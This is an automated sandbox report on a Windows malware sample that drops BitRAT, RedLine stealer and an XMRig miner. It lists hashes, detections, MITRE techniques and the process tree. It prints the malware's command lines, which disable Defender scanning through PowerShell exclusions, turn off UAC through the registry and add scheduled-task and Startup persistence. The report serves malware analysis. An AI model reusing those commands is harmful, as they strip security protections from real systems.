bitrat | f42c028b94d5717a0eda919f4d3264e7b09ea61ad5d7d61d1698515b973d12ea

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-en-20211014
submitted
04-12-2021 11:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

adf38593d8b6c9562b56589188733788.exe
Size

8.9MB
MD5

adf38593d8b6c9562b56589188733788
SHA1

dadf3bca69617147c65fe0ac6988091ef99b99b3
SHA256

f42c028b94d5717a0eda919f4d3264e7b09ea61ad5d7d61d1698515b973d12ea
SHA512

a46f4fc8c62be259a70958276f5f31f0d94830cd53acb39907c4ee81204f5203086789b692beb230f9144cc3e24aecd4e3e5f6c693bbd3c9c82b897e0b846dba

Score

10^/10

bitrat redline xmrig discovery evasion infostealer miner spyware stealer suricata trojan

Malware Config

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

BitRAT Payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1532-175-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat
behavioral1/memory/1532-176-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat
behavioral1/memory/1532-177-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat
behavioral1/memory/1532-179-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat
behavioral1/memory/1532-180-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat
behavioral1/memory/1532-181-0x000000000068A488-mapping.dmp	family_bitrat
behavioral1/memory/1532-186-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe	family_redline
\Users\Admin\AppData\Local\Temp\Installer.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Installer.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Installer.exe	family_redline
C:\Users\Admin\Documents\redlineTacNine.exe	family_redline
C:\Users\Admin\Documents\redlineTacNine.exe	family_redline

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1372-262-0x0000000140310068-mapping.dmp	xmrig
behavioral1/memory/1372-264-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig

Executes dropped EXE 13 IoCs

Processes:

Ujnlfschrqsf.exeKhgstquy.exeInstaller.exeJavaUpdaters.exeJavaSheduler.exeredlineTacNine.exeSecurityHealthSystray.exesmss.exesmss.exeSecurityHealthSystray.exeJavaUpdate.exeJavaUpdate.exesihost64.exe

pid	process
1220	Ujnlfschrqsf.exe
612	Khgstquy.exe
1992	Installer.exe
976	JavaUpdaters.exe
1568	JavaSheduler.exe
1712	redlineTacNine.exe
1068	SecurityHealthSystray.exe
1516	smss.exe
1660	smss.exe
1532	SecurityHealthSystray.exe
608	JavaUpdate.exe
812	JavaUpdate.exe
1448	sihost64.exe

Drops startup file 2 IoCs

Processes:

SecurityHealthSystray.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.exe	SecurityHealthSystray.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.exe	SecurityHealthSystray.exe

Loads dropped DLL 6 IoCs

Processes:

adf38593d8b6c9562b56589188733788.exeUjnlfschrqsf.exeInstaller.execmd.exeJavaUpdate.exe

pid	process
776	adf38593d8b6c9562b56589188733788.exe
776	adf38593d8b6c9562b56589188733788.exe
1220	Ujnlfschrqsf.exe
1992	Installer.exe
1712	cmd.exe
608	JavaUpdate.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

JavaSheduler.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	JavaSheduler.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

SecurityHealthSystray.exe

pid	process
1532	SecurityHealthSystray.exe
1532	SecurityHealthSystray.exe
1532	SecurityHealthSystray.exe
1532	SecurityHealthSystray.exe
1532	SecurityHealthSystray.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

SecurityHealthSystray.exeJavaUpdate.exe

description	pid	process	target process
PID 1068 set thread context of 1532	1068	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 812 set thread context of 1372	812	JavaUpdate.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

1540 schtasks.exe
1116 schtasks.exe
1372 schtasks.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1408 reg.exe

pid	process
1540	schtasks.exe
1116	schtasks.exe
1372	schtasks.exe

pid	process
1408	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

JavaSheduler.exesmss.exepowershell.exeSecurityHealthSystray.exepowershell.exepowershell.exeredlineTacNine.exepowershell.exeKhgstquy.exesmss.exe

pid	process
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1568	JavaSheduler.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
1516	smss.exe
544	powershell.exe
1068	SecurityHealthSystray.exe
1068	SecurityHealthSystray.exe
1068	SecurityHealthSystray.exe
1068	SecurityHealthSystray.exe
1948	powershell.exe
1512	powershell.exe
1712	redlineTacNine.exe
1688	powershell.exe
612	Khgstquy.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe
1660	smss.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

smss.exe

pid process

1660 smss.exe

pid	process
1660	smss.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

JavaSheduler.exesmss.exeSecurityHealthSystray.exeredlineTacNine.exepowershell.exepowershell.exepowershell.exepowershell.exeKhgstquy.exesmss.exeJavaUpdaters.exeSecurityHealthSystray.exepowershell.exepowershell.exepowershell.exepowershell.exeJavaUpdate.exeJavaUpdate.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1568	JavaSheduler.exe
Token: SeDebugPrivilege	1516	smss.exe
Token: SeDebugPrivilege	1068	SecurityHealthSystray.exe
Token: SeDebugPrivilege	1712	redlineTacNine.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	612	Khgstquy.exe
Token: SeDebugPrivilege	1660	smss.exe
Token: SeDebugPrivilege	976	JavaUpdaters.exe
Token: SeDebugPrivilege	1532	SecurityHealthSystray.exe
Token: SeShutdownPrivilege	1532	SecurityHealthSystray.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	608	JavaUpdate.exe
Token: SeDebugPrivilege	812	JavaUpdate.exe
Token: SeLockMemoryPrivilege	1372	explorer.exe
Token: SeLockMemoryPrivilege	1372	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

SecurityHealthSystray.exe

pid process

1532 SecurityHealthSystray.exe
1532 SecurityHealthSystray.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

adf38593d8b6c9562b56589188733788.exeUjnlfschrqsf.exeInstaller.exeJavaSheduler.exeSecurityHealthSystray.execmd.exeKhgstquy.execmd.exeJavaUpdaters.execmd.exetaskeng.exe

description	pid	process	target process
PID 776 wrote to memory of 1220	776	adf38593d8b6c9562b56589188733788.exe	Ujnlfschrqsf.exe
PID 776 wrote to memory of 1220	776	adf38593d8b6c9562b56589188733788.exe	Ujnlfschrqsf.exe
PID 776 wrote to memory of 1220	776	adf38593d8b6c9562b56589188733788.exe	Ujnlfschrqsf.exe
PID 776 wrote to memory of 1220	776	adf38593d8b6c9562b56589188733788.exe	Ujnlfschrqsf.exe
PID 776 wrote to memory of 612	776	adf38593d8b6c9562b56589188733788.exe	Khgstquy.exe
PID 776 wrote to memory of 612	776	adf38593d8b6c9562b56589188733788.exe	Khgstquy.exe
PID 776 wrote to memory of 612	776	adf38593d8b6c9562b56589188733788.exe	Khgstquy.exe
PID 776 wrote to memory of 612	776	adf38593d8b6c9562b56589188733788.exe	Khgstquy.exe
PID 1220 wrote to memory of 1992	1220	Ujnlfschrqsf.exe	Installer.exe
PID 1220 wrote to memory of 1992	1220	Ujnlfschrqsf.exe	Installer.exe
PID 1220 wrote to memory of 1992	1220	Ujnlfschrqsf.exe	Installer.exe
PID 1992 wrote to memory of 976	1992	Installer.exe	JavaUpdaters.exe
PID 1992 wrote to memory of 976	1992	Installer.exe	JavaUpdaters.exe
PID 1992 wrote to memory of 976	1992	Installer.exe	JavaUpdaters.exe
PID 1992 wrote to memory of 1568	1992	Installer.exe	JavaSheduler.exe
PID 1992 wrote to memory of 1568	1992	Installer.exe	JavaSheduler.exe
PID 1992 wrote to memory of 1568	1992	Installer.exe	JavaSheduler.exe
PID 1992 wrote to memory of 1712	1992	Installer.exe	redlineTacNine.exe
PID 1992 wrote to memory of 1712	1992	Installer.exe	redlineTacNine.exe
PID 1992 wrote to memory of 1712	1992	Installer.exe	redlineTacNine.exe
PID 1992 wrote to memory of 1712	1992	Installer.exe	redlineTacNine.exe
PID 1992 wrote to memory of 1068	1992	Installer.exe	SecurityHealthSystray.exe
PID 1992 wrote to memory of 1068	1992	Installer.exe	SecurityHealthSystray.exe
PID 1992 wrote to memory of 1068	1992	Installer.exe	SecurityHealthSystray.exe
PID 1992 wrote to memory of 1068	1992	Installer.exe	SecurityHealthSystray.exe
PID 1568 wrote to memory of 1540	1568	JavaSheduler.exe	schtasks.exe
PID 1568 wrote to memory of 1540	1568	JavaSheduler.exe	schtasks.exe
PID 1568 wrote to memory of 1540	1568	JavaSheduler.exe	schtasks.exe
PID 1068 wrote to memory of 544	1068	SecurityHealthSystray.exe	powershell.exe
PID 1068 wrote to memory of 544	1068	SecurityHealthSystray.exe	powershell.exe
PID 1068 wrote to memory of 544	1068	SecurityHealthSystray.exe	powershell.exe
PID 1068 wrote to memory of 544	1068	SecurityHealthSystray.exe	powershell.exe
PID 1068 wrote to memory of 1408	1068	SecurityHealthSystray.exe	reg.exe
PID 1068 wrote to memory of 1408	1068	SecurityHealthSystray.exe	reg.exe
PID 1068 wrote to memory of 1408	1068	SecurityHealthSystray.exe	reg.exe
PID 1068 wrote to memory of 1408	1068	SecurityHealthSystray.exe	reg.exe
PID 1568 wrote to memory of 1516	1568	JavaSheduler.exe	smss.exe
PID 1568 wrote to memory of 1516	1568	JavaSheduler.exe	smss.exe
PID 1568 wrote to memory of 1516	1568	JavaSheduler.exe	smss.exe
PID 1568 wrote to memory of 1116	1568	JavaSheduler.exe	cmd.exe
PID 1568 wrote to memory of 1116	1568	JavaSheduler.exe	cmd.exe
PID 1568 wrote to memory of 1116	1568	JavaSheduler.exe	cmd.exe
PID 1116 wrote to memory of 1512	1116	cmd.exe	chcp.com
PID 1116 wrote to memory of 1512	1116	cmd.exe	chcp.com
PID 1116 wrote to memory of 1512	1116	cmd.exe	chcp.com
PID 1116 wrote to memory of 1992	1116	cmd.exe	chcp.com
PID 1116 wrote to memory of 1992	1116	cmd.exe	chcp.com
PID 1116 wrote to memory of 1992	1116	cmd.exe	chcp.com
PID 612 wrote to memory of 1052	612	Khgstquy.exe	cmd.exe
PID 612 wrote to memory of 1052	612	Khgstquy.exe	cmd.exe
PID 612 wrote to memory of 1052	612	Khgstquy.exe	cmd.exe
PID 1052 wrote to memory of 1948	1052	cmd.exe	powershell.exe
PID 1052 wrote to memory of 1948	1052	cmd.exe	powershell.exe
PID 1052 wrote to memory of 1948	1052	cmd.exe	powershell.exe
PID 976 wrote to memory of 1196	976	JavaUpdaters.exe	cmd.exe
PID 976 wrote to memory of 1196	976	JavaUpdaters.exe	cmd.exe
PID 976 wrote to memory of 1196	976	JavaUpdaters.exe	cmd.exe
PID 1196 wrote to memory of 1512	1196	cmd.exe	powershell.exe
PID 1196 wrote to memory of 1512	1196	cmd.exe	powershell.exe
PID 1196 wrote to memory of 1512	1196	cmd.exe	powershell.exe
PID 1080 wrote to memory of 1660	1080	taskeng.exe	smss.exe
PID 1080 wrote to memory of 1660	1080	taskeng.exe	smss.exe
PID 1080 wrote to memory of 1660	1080	taskeng.exe	smss.exe
PID 1052 wrote to memory of 1320	1052	cmd.exe	powershell.exe

System policy modification 1 TTPs 11 IoCs

evasion

Modify Registry

T1112

Processes:

JavaSheduler.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0"	JavaSheduler.exe

C:\Users\Admin\AppData\Local\Temp\adf38593d8b6c9562b56589188733788.exe
"C:\Users\Admin\AppData\Local\Temp\adf38593d8b6c9562b56589188733788.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:776

C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe
"C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1220

C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992

C:\Users\Admin\Documents\JavaUpdaters.exe
"C:\Users\Admin\Documents\JavaUpdaters.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
5⤵
PID:996

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
6⤵
- Creates scheduled task(s)
PID:1372

C:\Windows\system32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\JavaUpdate.exe"
5⤵
PID:832

C:\Users\Admin\JavaUpdate.exe
C:\Users\Admin\JavaUpdate.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
7⤵
PID:1488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
8⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
8⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Windows\explorer.exe
C:\Windows\explorer.exe bdrrwwdwgydz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0/qJixxsRFFHuJTRy3GDygkOjVFfVGxiAqnI6VEOc7K3GIpMARLTx8uWvB5r0QCuVxF7mJwq0yZvWtCbqmRbkmZuVZDNS8Z8qSNYFAB9Ezc/UmTMFmIx0AcwGvE4K2P6YLmUzmziU4T47mA6dtccAW3XzwDMQxG3WY1abSgyiNJtkV3dlzQD8J0HdSeITY8LegOxuzUGfCrbTgW9u2VAa7RVnzGoVoJX5bAxBGFalnm/oKnCPIJNkilErgYiQQFePCwbkbNxG9rLOt6BtVbQgZBbjI5+yoXZmTbNVwOoWnVQv9j2OJzMj/D/CCiMS0rucIeLPm5I2quqcTpryb4Vo9+HlPPT2RVsQg2Xx+WtKtCi8H/3R5BYre5iEkJhwqGDEqCiiGtJieTvFYa9LUaN0GOPvVEjCOtoaFltF2Dl/LzjMvLW/HdsZ7p1g5iLOSFzNYYO0TSq337RuFN/21X4vXRdrTXVIZAV2pzmMvGm/mAXuTYURLG4/sTS+HgpY3h1vYVNDWRRucFqvAl0w1LLKcAWDLFSxqixrMrCOUmTYbwmRC8KXPC1aeKdbX+yKxS46zWpYMQphF9mQKcqTsdSuuFy2jl4gEKWMYvC9YHX/UpcJHvIVF1vqi+kmtHvlREfvW6e3OvaXPk1eYm/Cc7rzBH1d/h/DdjyNA9bm+TU3tMjgBJePNGq8iAAVZl1hcEw7o+8XruAZgDJmryPftljgzTigQn4Dwu7XVjedQ9m2d+53BK4EIPVTP/BrxDAeVnlPaFj0vOd4MKQBRCp1vQkS2rxJ2oZ1ReX7opWcR7IW0/881l1T2vhOLfv8cJYpxfZxntVgZ0BVT/Pz884jBLcwpURpAF49IvgqsraaeH6gMOYNMj0Vinsljf7crKght1+dZrNK2+n+PAR2+vYw1Tm3FCM/MgTfuMmVTYkx7NqQjc4JVg1CfCt/cmfGJ71HMoO8Yh3d+uL/0CiDG78z/lQMCEbQ2HJ/U3i3cfcEuPH47qexLrtaDROcVLECp2OLSzXAPjwXFpSD8nMxp72KkGCh3xVV9Q2Lp4AnHE04Vdf+FAko1nf+CD5lD5F9rpUG/xRkY4XNYkOXnBldKVr5ZP+gvfxfgviei2LjaSL0wvgyXGRxQxCFScX+1Y2HUYnN3+hDX9hr02AQWcIZU9XbKNMKlvBvzjyBMIW5Pc23HSIDwphk8oxRYvro45WSrpvb5fA1lbKSXTIiARjSpzkJdFJCkj5w1giikZ4nujLybev0AUFFJs5cWBjNx9qWhN6m05vTZhZJCEwTtMjVRG3zZLIZcuvZiewRKSwMJUMPJsTk2XX7KR7R5pGTxIxsPXQgjnXf1SGF5nHMA5Ay284VN0r5D1jq23i47QIufpQcXxPF9S2WKPsPR0DuSyUHcr8G3Mhq6X79f6wngKrI/3kgXc84uzWstvC6aO4EaZRoKKnPgSuygiJie668FEi5z3RkwiENc2BxP7xqAPAD6AACNpbp6CuVxYeQEy/A/A+Z9XPqfQNdjT42VuX1tsXHy1IeMiZ8VwFn1MryYuuqpy6boHwhOtcfyL5L/ZAlRd3PKBgAJYJiWzUTMU8QWyMU5wGy0kcl0Kn0SHPojjHvh4tJxevM+w==
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Users\Admin\Documents\JavaSheduler.exe
"C:\Users\Admin\Documents\JavaSheduler.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1568

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /rl highest /tn Explorer /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe" /f
5⤵
- Creates scheduled task(s)
PID:1540

C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Remove.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\system32\chcp.com
chcp 1251
6⤵
PID:1512

C:\Windows\system32\chcp.com
chcp 866
6⤵
PID:1992

C:\Users\Admin\Documents\redlineTacNine.exe
"C:\Users\Admin\Documents\redlineTacNine.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Users\Admin\Documents\SecurityHealthSystray.exe
"C:\Users\Admin\Documents\SecurityHealthSystray.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension .exe;Add-MpPreference -ExclusionPath "C:\ " "
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- Modifies registry key
PID:1408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c Copy "C:\Users\Admin\Documents\SecurityHealthSystray.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.exe"
5⤵
PID:1152

C:\Users\Admin\Documents\SecurityHealthSystray.exe
"C:\Users\Admin\Documents\SecurityHealthSystray.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1532

C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe
"C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
